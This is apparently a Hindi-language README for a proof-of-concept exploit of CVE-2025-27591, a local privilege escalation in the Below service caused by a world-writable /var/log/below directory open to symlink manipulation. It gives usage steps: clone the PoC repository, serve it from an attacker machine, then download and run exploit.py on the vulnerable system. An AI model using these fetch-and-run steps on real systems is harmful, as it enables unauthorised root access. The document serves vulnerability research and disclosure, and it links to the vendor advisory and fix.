
CVE-2025-27591 एक विशेषाधिकार वृद्धि भेद्यता है जो संस्करण 0.9.0 से पहले Below सेवा को प्रभावित करती थी।
CVE-2025-27591 एक विशेषाधिकार वृद्धि कमजोरी है जो संस्करण 0.9.0 से पहले Below सेवा को प्रभावित करती है। यह समस्या /var/log/below पर एक विश्व-लेखन योग्य निर्देशिका बनाने के कारण उत्पन्न हुई। एक हमलावर इस निर्देशिका के भीतर सिमलिंक्स में हेरफेर करके इस कमजोरी का शोषण कर सकता है और संभावित रूप से रूट विशेषाधिकार प्राप्त कर सकता है, जिससे यह स्थानीय गैर-विशेषाधिकार प्राप्त उपयोगकर्ताओं के लिए एक महत्वपूर्ण सुरक्षा चिंता बन जाती है।
यह प्रमाण-अवधारणा केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए लिखा गया था।
लेखन के समय, इस कमजोरी के लिए समुदाय में कोई सार्वजनिक रूप से उपलब्ध PoC मौजूद नहीं था। इसलिए, मैंने उस अंतर को भरने, सुरक्षा अनुसंधान पारिस्थितिकी तंत्र में योगदान देने और असुरक्षित फाइलसिस्टम की गंभीर प्रकृति के बारे में जागरूकता बढ़ाने के लिए इस कार्यान्वयन को जिम्मेदारीपूर्वक साझा करने का निर्णय लिया।
हमलावर मशीन से:
1-git clone https://github.com/BridgerAlderson/CVE-2025-27591-PoC.git
2-cd CVE-2025-27591-PoC
3-python3 -m http.server 80
कमजोर सिस्टम से:
1- wget http:///exploit.py
2-python exploit.py
https://www.facebook.com/security/advisories/cve-2025-27591 https://github.com/facebookincubator/below/commit/da9382e6e3e332fd2c3195e22f34977f83f0f1f3